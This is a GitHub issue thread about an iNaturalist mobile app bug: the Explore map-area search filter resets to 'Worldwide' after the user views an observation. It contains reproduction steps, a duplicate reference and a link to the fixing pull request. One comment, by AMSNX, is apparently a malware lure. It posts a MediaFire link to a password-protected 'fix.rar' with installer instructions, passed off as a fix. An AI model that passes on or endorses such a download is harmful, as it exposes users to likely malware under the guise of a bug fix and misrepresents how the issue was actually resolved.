### ISSUE TITLE
Map area search lost after viewing obs

### ISSUE THREAD

**Issue by kueda** [inaturalist/iNaturalistReactNative#2002]
**Describe the bug**
Might not be the best description, but the Explore place doesn't seem to get saved after jumping through these hoops.

**To Reproduce**
1. Go to Explore 
2. Tap on any species result
3. Tap the Explore button on TaxonDetails
4. Redo search in a map area with observations
5. Tap an observation
6. Tap back
7. Explore is now set to "Worldwide" instead of the map area you chose

**Expected behavior**
If I redo the search in a map area and view an obs, that map area filter should still be there when I return.

**Context (please complete the following information):**
 - Device: iPhone SE, 3rd gen
 - OS: iOS 17.5.1
 - App version: [v0.43.0+112](https://github.com/inaturalist/iNaturalistReactNative/releases/tag/v0.43.0%2B112)

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by angielt** [comment]
repeat/related to #1780

**Comment by albullington** [comment]
Fixed via https://github.com/inaturalist/iNaturalistReactNative/pull/2015
